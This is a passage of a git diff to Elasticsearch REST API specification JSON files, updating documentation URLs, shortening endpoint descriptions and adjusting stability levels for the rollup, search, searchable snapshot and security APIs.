a/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.get_rollup_index_caps.json b/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.get_rollup_index_caps.json index c0e81ff7abcf4..e0220773d8f1e 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.get_rollup_index_caps.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.get_rollup_index_caps.json @@ -1,8 +1,8 @@ { "rollup.get_rollup_index_caps":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/rollup-get-rollup-index-caps.html", - "description":"Returns the rollup capabilities of all jobs inside of a rollup index (e.g. the index where rollup data is stored)." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-rollup-get-rollup-index-caps", + "description":"Get the rollup index capabilities" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.put_job.json b/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.put_job.json index 2ba845cfab506..f508d9cd5b153 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.put_job.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.put_job.json @@ -1,8 +1,8 @@ { "rollup.put_job":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/rollup-put-job.html", - "description":"Creates a rollup job." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-rollup-put-job", + "description":"Create a rollup job" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.rollup_search.json b/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.rollup_search.json index dfd8c7dec5241..738bebe9df9e8 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.rollup_search.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.rollup_search.json @@ -1,8 +1,8 @@ { "rollup.rollup_search":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/rollup-search.html", - "description":"Enables searching rolled-up data using the standard query DSL." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-rollup-rollup-search", + "description":"Search rolled-up data" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.start_job.json b/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.start_job.json index 85250cfcfcdcd..216f0c2909ffe 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.start_job.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.start_job.json @@ -1,8 +1,8 @@ { "rollup.start_job":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/rollup-start-job.html", - "description":"Starts an existing, stopped rollup job." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-rollup-start-job", + "description":"Start rollup jobs" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.stop_job.json b/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.stop_job.json index f6405cc99eb02..6ba9d7dc822f8 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.stop_job.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.stop_job.json @@ -1,8 +1,8 @@ { "rollup.stop_job":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/rollup-stop-job.html", - "description":"Stops an existing, started rollup job." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-rollup-stop-job", + "description":"Stop rollup jobs" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/scripts_painless_execute.json b/rest-api-spec/src/main/resources/rest-api-spec/api/scripts_painless_execute.json index b26d31fb6c0ce..dd7ea1bc9970d 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/scripts_painless_execute.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/scripts_painless_execute.json @@ -1,8 +1,8 @@ { "scripts_painless_execute":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/painless/master/painless-execute-api.html", - "description":"Allows an arbitrary script to be executed and a result to be returned" + "url":"https://www.elastic.co/docs/reference/scripting-languages/painless/painless-api-examples", + "description":"Run a script" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/scroll.json b/rest-api-spec/src/main/resources/rest-api-spec/api/scroll.json index 553ee83587198..b29a4fbc6db54 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/scroll.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/scroll.json @@ -1,8 +1,8 @@ { "scroll":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/search-request-body.html#request-body-search-scroll", - "description":"Allows to retrieve a large numbers of results from a single search request." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-scroll", + "description":"Run a scrolling search" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/search.json b/rest-api-spec/src/main/resources/rest-api-spec/api/search.json index 25b4efd9c4c37..7e267342f23be 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/search.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/search.json @@ -1,8 +1,8 @@ { "search":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/search-search.html", - "description":"Returns results matching a query." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search", + "description":"Run a search" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.delete.json b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.delete.json index 19bba8738c029..dee6b0f1faad9 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.delete.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.delete.json @@ -1,10 +1,10 @@ { "search_application.delete": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/delete-search-application.html", - "description": "Deletes a search application." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-application-delete", + "description": "Delete a search application" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.delete_behavioral_analytics.json b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.delete_behavioral_analytics.json index 77a99c4c5d836..41bf1bdb654e0 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.delete_behavioral_analytics.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.delete_behavioral_analytics.json @@ -1,8 +1,8 @@ { "search_application.delete_behavioral_analytics": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/delete-analytics-collection.html", - "description": "Delete a behavioral analytics collection." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-application-delete-behavioral-analytics", + "description": "Delete a behavioral analytics collection" }, "stability": "experimental", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.get.json b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.get.json index d91b2b2498eb7..9765d6b336f59 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.get.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.get.json @@ -1,10 +1,10 @@ { "search_application.get": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/get-search-application.html", - "description": "Returns the details about a search application." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-application-get", + "description": "Get search application details" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.get_behavioral_analytics.json b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.get_behavioral_analytics.json index c4d2edcf42fc2..dcc9b6a4e4e1a 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.get_behavioral_analytics.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.get_behavioral_analytics.json @@ -1,8 +1,8 @@ { "search_application.get_behavioral_analytics": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/list-analytics-collection.html", - "description": "Returns the existing behavioral analytics collections." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-application-get-behavioral-analytics", + "description": "Get behavioral analytics collections" }, "stability": "experimental", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.list.json b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.list.json index 19e75a1b92dd9..67e53841a8478 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.list.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.list.json @@ -1,10 +1,10 @@ { "search_application.list": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/list-search-applications.html", - "description": "Returns the existing search applications." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-application-get-behavioral-analytics", + "description": "Get search applications" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.post_behavioral_analytics_event.json b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.post_behavioral_analytics_event.json index b497c3b1314bc..2ab8f7dee7d09 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.post_behavioral_analytics_event.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.post_behavioral_analytics_event.json @@ -1,8 +1,8 @@ { "search_application.post_behavioral_analytics_event": { "documentation": { - "url": "http://todo.com/tbd", - "description": "Creates a behavioral analytics event for existing collection." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-application-post-behavioral-analytics-event", + "description": "Create a behavioral analytics collection event" }, "stability": "experimental", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.put.json b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.put.json index b20df20bd234e..bd23a599f8abe 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.put.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.put.json @@ -1,10 +1,10 @@ { "search_application.put": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/put-search-application.html", - "description": "Creates or updates a search application." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-application-put", + "description": "Create or update a search application" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.put_behavioral_analytics.json b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.put_behavioral_analytics.json index 811791dd586dd..cc8963ca08c23 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.put_behavioral_analytics.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.put_behavioral_analytics.json @@ -1,8 +1,8 @@ { "search_application.put_behavioral_analytics": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/put-analytics-collection.html", - "description": "Creates a behavioral analytics collection." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-application-put-behavioral-analytics", + "description": "Create a behavioral analytics collection" }, "stability": "experimental", "deprecated": { diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.render_query.json b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.render_query.json index 5aece1b626898..2769e88d3161d 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.render_query.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.render_query.json @@ -1,8 +1,8 @@ { "search_application.render_query": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/search-application-render-query.html", - "description": "Renders a query for given search application search parameters" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-application-render-query", + "description": "Render a search application query" }, "stability": "experimental", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.search.json b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.search.json index d0a8d36d9b46d..37cef5c37c340 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.search.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.search.json @@ -1,10 +1,10 @@ { "search_application.search": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/search-application-search.html", - "description": "Perform a search against a search application" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-application-search", + "description": "Run a search application search" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/search_mvt.json b/rest-api-spec/src/main/resources/rest-api-spec/api/search_mvt.json index 35ebe3b3f1d16..b6df801f96f2c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/search_mvt.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/search_mvt.json @@ -1,10 +1,10 @@ { "search_mvt": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/search-vector-tile-api.html", - "description": "Searches a vector tile for geospatial values. Returns results as a binary Mapbox vector tile." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-mvt", + "description": "Search a vector tile" }, - "stability": "experimental", + "stability": "stable", "visibility": "public", "headers": { "accept": [ @@ -73,6 +73,15 @@ "description":"Determines the geometry type for features in the aggs layer.", "default":"grid" }, + "grid_agg":{ + "type":"enum", + "options":[ + "geotile", + "geohex" + ], + "description":"Aggregation used to create a grid for `field`.", + "default":"geotile" + }, "size":{ "type":"int", "description":"Maximum number of features to return in the hits layer. Accepts 0-10000.", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/search_shards.json b/rest-api-spec/src/main/resources/rest-api-spec/api/search_shards.json index 8e80cd15d9ea2..d55e24837c0b5 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/search_shards.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/search_shards.json @@ -1,8 +1,8 @@ { "search_shards":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/search-shards.html", - "description":"Returns information about the indices and shards that a search request would be executed against." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-shards", + "description":"Get the search shards" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/search_template.json b/rest-api-spec/src/main/resources/rest-api-spec/api/search_template.json index 22a2a8367bc17..5dabae85f7760 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/search_template.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/search_template.json @@ -1,8 +1,8 @@ { "search_template":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/search-template.html", - "description":"Allows to use the Mustache language to pre-render a search definition." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-template", + "description":"Run a search with a search template" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/searchable_snapshots.cache_stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/searchable_snapshots.cache_stats.json index 3cfb71bb11e14..0a0413500b40e 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/searchable_snapshots.cache_stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/searchable_snapshots.cache_stats.json @@ -1,8 +1,8 @@ { "searchable_snapshots.cache_stats": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/searchable-snapshots-apis.html", - "description": "Retrieve node-level cache statistics about searchable snapshots." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-searchable-snapshots-cache-stats", + "description": "Get cache statistics" }, "stability": "experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/searchable_snapshots.clear_cache.json b/rest-api-spec/src/main/resources/rest-api-spec/api/searchable_snapshots.clear_cache.json index d2d7000195c04..f599bf736a488 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/searchable_snapshots.clear_cache.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/searchable_snapshots.clear_cache.json @@ -1,7 +1,7 @@ { "searchable_snapshots.clear_cache": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/searchable-snapshots-apis.html", + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-searchable-snapshots-clear-cache", "description" : "Clear the cache of searchable snapshots." }, "stability": "experimental", @@ -25,7 +25,7 @@ "parts": { "index": { "type": "list", - "description": "A comma-separated list of index names" + "description": "Clear the cache" } } } @@ -50,10 +50,6 @@ ], "default": "open", "description": "Whether to expand wildcard expression to concrete indices that are open, closed or both." - }, - "index": { - "type": "list", - "description": "A comma-separated list of index name to limit the operation" } } } diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/searchable_snapshots.mount.json b/rest-api-spec/src/main/resources/rest-api-spec/api/searchable_snapshots.mount.json index b1a3893760a98..70d975a4b53d7 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/searchable_snapshots.mount.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/searchable_snapshots.mount.json @@ -1,8 +1,8 @@ { "searchable_snapshots.mount": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/searchable-snapshots-api-mount-snapshot.html", - "description": "Mount a snapshot as a searchable index." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-searchable-snapshots-mount", + "description": "Mount a snapshot" }, "stability": "stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/searchable_snapshots.stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/searchable_snapshots.stats.json index 9c35e51c70636..612130cbb86c8 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/searchable_snapshots.stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/searchable_snapshots.stats.json @@ -1,8 +1,8 @@ { "searchable_snapshots.stats": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/searchable-snapshots-apis.html", - "description": "Retrieve shard-level statistics about searchable snapshots." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-searchable-snapshots-stats", + "description": "Get searchable snapshot statistics" }, "stability": "stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.activate_user_profile.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.activate_user_profile.json index f03c79b876f80..8d5a5610b4328 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.activate_user_profile.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.activate_user_profile.json @@ -1,8 +1,8 @@ { "security.activate_user_profile":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-activate-user-profile.html", - "description":"Creates or updates the user profile on behalf of another user." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-activate-user-profile", + "description":"Activate a user profile" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.authenticate.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.authenticate.json index 3b65a7eebca10..15d41962f4616 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.authenticate.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.authenticate.json @@ -1,8 +1,8 @@ { "security.authenticate":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-authenticate.html", - "description":"Enables authentication as a user and retrieve information about the authenticated user." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-authenticate", + "description":"Authenticate a user" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.bulk_delete_role.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.bulk_delete_role.json index 8810602aa2c18..2c562c9c4ab8d 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.bulk_delete_role.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.bulk_delete_role.json @@ -1,8 +1,8 @@ { "security.bulk_delete_role": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-bulk-delete-role.html", - "description": "Bulk delete roles in the native realm." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-bulk-delete-role", + "description": "Bulk delete roles" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.bulk_put_role.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.bulk_put_role.json index f8916a48b31e6..fe8f54e104c2c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.bulk_put_role.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.bulk_put_role.json @@ -1,8 +1,8 @@ { "security.bulk_put_role": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-bulk-put-role.html", - "description": "Bulk adds and updates roles in the native realm." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-bulk-put-role", + "description": "Bulk create or update roles" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.bulk_update_api_keys.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.bulk_update_api_keys.json index 69d3255776f37..33dd038c38f60 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.bulk_update_api_keys.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.bulk_update_api_keys.json @@ -1,8 +1,8 @@ { "security.bulk_update_api_keys": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-bulk-update-api-keys.html", - "description": "Updates the attributes of multiple existing API keys." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-bulk-update-api-keys", + "description": "Bulk update API keys" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.change_password.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.change_password.json index c2b1391c1127d..6a5578118a007 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.change_password.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.change_password.json @@ -1,8 +1,8 @@ { "security.change_password":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-change-password.html", - "description":"Changes the passwords of users in the native realm and built-in users." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-change-password", + "description":"Change passwords" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_api_key_cache.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_api_key_cache.json index 2f3ce2f27e071..1c9063affc2d3 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_api_key_cache.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_api_key_cache.json @@ -1,8 +1,8 @@ { "security.clear_api_key_cache":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-clear-api-key-cache.html", - "description":"Clear a subset or all entries from the API key cache." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-clear-api-key-cache", + "description":"Clear the API key cache" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_cached_privileges.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_cached_privileges.json index f90fbf9c1b4dd..14edc27ad6ac2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_cached_privileges.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_cached_privileges.json @@ -1,8 +1,8 @@ { "security.clear_cached_privileges":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-clear-privilege-cache.html", - "description":"Evicts application privileges from the native application privileges cache." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-clear-cached-privileges", + "description":"Clear the privileges cache" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_cached_realms.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_cached_realms.json index 3b24c6ef423af..6221e0308fe85 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_cached_realms.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_cached_realms.json @@ -1,8 +1,8 @@ { "security.clear_cached_realms":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-clear-cache.html", - "description":"Evicts users from the user cache. Can completely clear the cache or evict specific users." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-clear-cached-realms", + "description":"Clear the user cache" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_cached_roles.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_cached_roles.json index 64a0efe551212..cd0d93db0be60 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_cached_roles.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_cached_roles.json @@ -1,8 +1,8 @@ { "security.clear_cached_roles":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-clear-role-cache.html", - "description":"Evicts roles from the native role cache." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-clear-cached-roles", + "description":"Clear the roles cache" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_cached_service_tokens.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_cached_service_tokens.json index 72c10d006569b..5481437841e2f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_cached_service_tokens.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_cached_service_tokens.json @@ -1,8 +1,8 @@ { "security.clear_cached_service_tokens":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-clear-service-token-caches.html", - "description":"Evicts tokens from the service account token caches." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-clear-cached-service-tokens", + "description":"Clear service account token caches" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.create_api_key.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.create_api_key.json index 31ab3993ce9c4..73e76154c06bd 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.create_api_key.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.create_api_key.json @@ -1,8 +1,8 @@ { "security.create_api_key":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-create-api-key.html", - "description":"Creates an API key for access without requiring basic authentication." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-create-api-key", + "description":"Create an API key" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.create_cross_cluster_api_key.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.create_cross_cluster_api_key.json index 88d6b97067492..179e85d2bc9bd 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.create_cross_cluster_api_key.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.create_cross_cluster_api_key.json @@ -1,8 +1,8 @@ { "security.create_cross_cluster_api_key": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-create-cross-cluster-api-key.html", - "description": "Creates a cross-cluster API key for API key based remote cluster access." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-create-cross-cluster-api-key", + "description": "Create a cross-cluster API key" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.create_service_token.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.create_service_token.json index 33bdf709fb7a2..fc531d714e2cf 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.create_service_token.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.create_service_token.json @@ -1,8 +1,8 @@ { "security.create_service_token":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-create-service-token.html", - "description":"Creates a service account token for access without requiring basic authentication." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-create-service-token", + "description":"Create a service account token" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.delegate_pki.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.delegate_pki.json index 752ea35028b4f..f808d900033c2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.delegate_pki.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.delegate_pki.json @@ -1,8 +1,8 @@ { "security.delegate_pki": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/security-api-delegate-pki-authentication.html", - "description": "Delegate PKI authentication." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-delegate-pki", + "description": "Delegate PKI authentication" }, 